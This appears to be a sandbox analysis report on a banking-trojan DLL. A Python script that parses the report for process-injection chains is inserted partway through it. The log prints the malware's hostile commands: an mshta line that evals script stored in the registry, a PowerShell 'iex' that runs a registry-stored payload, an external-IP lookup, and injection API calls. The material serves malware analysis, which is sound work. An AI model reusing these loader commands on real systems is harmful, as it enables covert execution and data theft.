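Source: C:\Windows\System32\control.exe Code function: 31_2_006BD748 NtMapViewOfSection, 31_2_006BD748
Source: C:\Windows\System32\control.exe Code function: 31_2_006B7B34 NtCreateSection, 31_2_006B7B34
Source: C:\Windows\System32\control.exe Code function: 31_2_006BEB10 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 31_2_006BEB10
Source: C:\Windows\System32\control.exe Code function: 31_2_006B67C8 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 31_2_006B67C8
Source: C:\Windows\System32\control.exe Code function: 31_2_006B2A04 31_2_006B2A04
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FC91C0 NtQueryInformationProcess, 34_2_0000024E31FC91C0
"""

# '<fid> api,api,api, <fid>'; functions without resolved calls repeat the id.
CODE_FN_RE = re.compile(
    r"^Source: (?P<proc>\S+) Code function: (?P<fid>\S+) (?:(?P<apis>\S+) )?(?P=fid)$")
# Only the 'WMI Queries' lines are parsed; 'WMI Registry write' repeats their Set* subset.
WMI_QUERY_RE = re.compile(
    r"^Source: (?P<proc>\S+) WMI Queries: IWbemServices::ExecMethod - "
    r"(?P<ns>\S+) : (?P<cls>\w+)::(?P<method>\w+)$")

# Heuristic groupings (this example's, not the sandbox's): a process that has a
# placement primitive and an execution primitive can run code in another process.
PLACEMENT = {
    "section mapping": {"NtCreateSection", "NtMapViewOfSection"},
    "remote write": {"NtAllocateVirtualMemory", "NtWriteVirtualMemory"},
}
EXECUTION = {
    "remote thread": {"CreateRemoteThread"},
    "thread context hijack": {"NtSetContextThread"},
}
WMI_WRITE_PREFIXES = ("Set", "Create", "Delete")


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_lines(text):
    apis_by_proc = defaultdict(set)
    wmi_by_proc = defaultdict(lambda: {"reads": 0, "writes": 0, "methods": []})
    for line in text.splitlines():
        line = line.strip()
        m = CODE_FN_RE.match(line)
        if m:
            apis = [a for a in (m["apis"] or "").split(",") if a]
            apis_by_proc[basename(m["proc"])].update(apis)
            continue
        m = WMI_QUERY_RE.match(line)
        if m and m["cls"] == "StdRegProv":
            entry = wmi_by_proc[basename(m["proc"])]
            kind = "writes" if m["method"].startswith(WMI_WRITE_PREFIXES) else "reads"
            entry[kind] += 1
            entry["methods"].append(m["method"])
    return apis_by_proc, wmi_by_proc


def analyse(text):
    """Per process: which placement/execution primitives are present, whether
    both halves of an injection chain are there, and StdRegProv read/write counts."""
    apis_by_proc, wmi_by_proc = parse_lines(text)
    findings = {}
    for proc in set(apis_by_proc) | set(wmi_by_proc):
        apis = apis_by_proc.get(proc, set())
        placement = sorted(n for n, need in PLACEMENT.items() if need <= apis)
        execution = sorted(n for n, need in EXECUTION.items() if need <= apis)
        findings[proc] = {
            "placement": placement,
            "execution": execution,
            "complete_chain": bool(placement and execution),
            "wmi": wmi_by_proc.get(proc, {"reads": 0, "writes": 0, "methods": []}),
        }
    return findings


if __name__ == "__main__":
    for proc, f in sorted(analyse(SAMPLE_REPORT).items()):
        print(proc, f)
```

On the report's own lines, control.exe (process 31) carries both halves of the chain, which matches the "Maps a DLL or memory area into another process", "Modifies the context of a thread in another process" and "Creates a thread in another existing process" signatures at the top of the page; regsvr32.exe (process 1) shows the section primitives only, and rundll32.exe (process 34) shows none.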
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A8B0AC 1_2_04A8B0AC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A88534 1_2_04A88534
Source: C:\Windows\System32\control.exe Code function: 31_2_006B2A04 31_2_006B2A04
Source: C:\Windows\System32\control.exe Code function: 31_2_006A932C 31_2_006A932C
Source: C:\Windows\System32\control.exe Code function: 31_2_006B67C8 31_2_006B67C8
Source: C:\Windows\System32\control.exe Code function: 31_2_006BF06C 31_2_006BF06C
Source: C:\Windows\System32\control.exe Code function: 31_2_006BCC1C 31_2_006BCC1C
Source: C:\Windows\System32\control.exe Code function: 31_2_006B64DC 31_2_006B64DC
Source: C:\Windows\System32\control.exe Code function: 31_2_006BC8A8 31_2_006BC8A8
Source: C:\Windows\System32\control.exe Code function: 31_2_006BCC80 31_2_006BCC80
Source: C:\Windows\System32\control.exe Code function: 31_2_006A3498 31_2_006A3498
Source: C:\Windows\System32\control.exe Code function: 31_2_006B909C 31_2_006B909C
Source: C:\Windows\System32\control.exe Code function: 31_2_006B096B 31_2_006B096B
Source: C:\Windows\System32\control.exe Code function: 31_2_006C117C 31_2_006C117C
Source: C:\Windows\System32\control.exe Code function: 31_2_006C654C 31_2_006C654C
Source: C:\Windows\System32\control.exe Code function: 31_2_006A8D2C 31_2_006A8D2C
Source: C:\Windows\System32\control.exe Code function: 31_2_006B051C 31_2_006B051C
Source: C:\Windows\System32\control.exe Code function: 31_2_006AFDD8 31_2_006AFDD8
Source: C:\Windows\System32\control.exe Code function: 31_2_006C31A4 31_2_006C31A4
Source: C:\Windows\System32\control.exe Code function: 31_2_006AA1A0 31_2_006AA1A0
Source: C:\Windows\System32\control.exe Code function: 31_2_006B4670 31_2_006B4670
Source: C:\Windows\System32\control.exe Code function: 31_2_006B2648 31_2_006B2648
Source: C:\Windows\System32\control.exe Code function: 31_2_006A964C 31_2_006A964C
Source: C:\Windows\System32\control.exe Code function: 31_2_006C7228 31_2_006C7228
Source: C:\Windows\System32\control.exe Code function: 31_2_006BC224 31_2_006BC224
Source: C:\Windows\System32\control.exe Code function: 31_2_006B0EC4 31_2_006B0EC4
Source: C:\Windows\System32\control.exe Code function: 31_2_006C7EDC 31_2_006C7EDC
Source: C:\Windows\System32\control.exe Code function: 31_2_006A7ED8 31_2_006A7ED8
Source: C:\Windows\System32\control.exe Code function: 31_2_006A4AA0 31_2_006A4AA0
Source: C:\Windows\System32\control.exe Code function: 31_2_006AA6A4 31_2_006AA6A4
Source: C:\Windows\System32\control.exe Code function: 31_2_006AB2A4 31_2_006AB2A4
Source: C:\Windows\System32\control.exe Code function: 31_2_006C5A88 31_2_006C5A88
Source: C:\Windows\System32\control.exe Code function: 31_2_006B3A9C 31_2_006B3A9C
Source: C:\Windows\System32\control.exe Code function: 31_2_006A5B40 31_2_006A5B40
Source: C:\Windows\System32\control.exe Code function: 31_2_006C6BDC 31_2_006C6BDC
Source: C:\Windows\System32\control.exe Code function: 31_2_006BF7D4 31_2_006BF7D4
Source: C:\Windows\System32\control.exe Code function: 31_2_006C4FA8 31_2_006C4FA8
Source: C:\Windows\System32\control.exe Code function: 31_2_006A6380 31_2_006A6380
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FD2A04 34_2_0000024E31FD2A04
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FC932C 34_2_0000024E31FC932C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FE5A88 34_2_0000024E31FE5A88
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FD4670 34_2_0000024E31FD4670
One or more processes crash
Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 728
PE / OLE file has an invalid certificate
Source: vnaSKDMnLG.dll Static PE information: invalid certificate
PE file does not import any functions
Source: q3xypckz.dll.24.dr Static PE information: No import functions for PE file found
Source: chv50z53.dll.26.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ~ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: } .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: | .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: { .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: z .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: y .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: x .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: w .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: v .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: u .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: t .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: s .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: r .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: q .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: p .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: o .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: n .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: m .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: l .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: k .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: j .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: i .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: h .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: g .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: f .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: e .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: d .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: c .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: b .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: a .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ` .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: _ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ^ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ] .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: [ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: z .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: y .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: x .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: w .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: v .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: u .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: t .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: s .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: r .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: q .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: p .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: o .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: n .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: m .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: l .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: k .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: j .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: i .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: h .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: g .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: f .dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: e .dll
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@49/188@15/6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A8A648 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 1_2_04A8A648
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{59229456-2F94-11EB-90E6-ECF4BB82F7E0}.dat
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4360
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{0C6A49DB-FB1D-1E7B-E500-5F32E9340386}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{2C9A59B6-9B4F-3EC0-8520-FF528954A3A6}
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{6824B7BA-A73C-DA91-711C-CBAE35102FC2}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user~1\AppData\Local\Temp\~DF876656104E15310A.TMP
Source: vnaSKDMnLG.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: vnaSKDMnLG.dll Virustotal: Detection: 11%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\vnaSKDMnLG.dll'
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\vnaSKDMnLG.dll
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:82952 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17434 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17438 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17446 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17456 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESBA2B.tmp' 'c:\Users\user\AppData\Local\Temp\q3xypckz\CSC358FCCDF4025435CA355D903053645.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESC8D1.tmp' 'c:\Users\user\AppData\Local\Temp\chv50z53\CSCD671F0735D74415BB6A373562E60C48B.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 728
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\4EC0.bi1'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\vnaSKDMnLG.dll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:82952 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17434 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17438 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17446 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17456 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESBA2B.tmp' 'c:\Users\user\AppData\Local\Temp\q3xypckz\CSC358FCCDF4025435CA355D903053645.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESC8D1.tmp' 'c:\Users\user\AppData\Local\Temp\chv50z53\CSCD671F0735D74415BB6A373562E60C48B.TMP'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\4EC0.bi1'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: vnaSKDMnLG.dll Static PE information: More than 246 > 100 exports found
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: vnaSKDMnLG.dll Static PE information: More than 200 imports for kernel32.dll
Source: vnaSKDMnLG.dll Static PE information: More than 200 imports for user32.dll
Source: vnaSKDMnLG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.pdbXP source: powershell.exe, 00000016.00000002.479178421.0000020E9417E000.00000004.00000001.sdmp
Source: Binary string: %p'U:\tautologism\throatlet\pignoration\schorly\gansel\early.pdb source: regsvr32.exe
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000018.00000002.404055652.00000252B2A30000.00000002.00000001.sdmp, csc.exe, 0000001A.00000002.411630452.000001870CDE0000.00000002.00000001.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.pdb source: powershell.exe, 00000016.00000002.479178421.0000020E9417E000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001E.00000000.440194854.000000000DE20000.00000002.00000001.sdmp
Source: Binary string: Y:\ruach\endeared\unroaded\warl\homolographic\palpableness.pdb source: regsvr32.exe
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.pdb source: powershell.exe, 00000016.00000002.479178421.0000020E9417E000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.429818290.0000000005E10000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: explorer.exe, 0000001E.00000003.475607215.0000000006C40000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.429818290.0000000005E10000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: explorer.exe, 0000001E.00000003.475607215.0000000006C40000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 0000001F.00000002.447514159.000002090E7CC000.00000004.00000040.sdmp
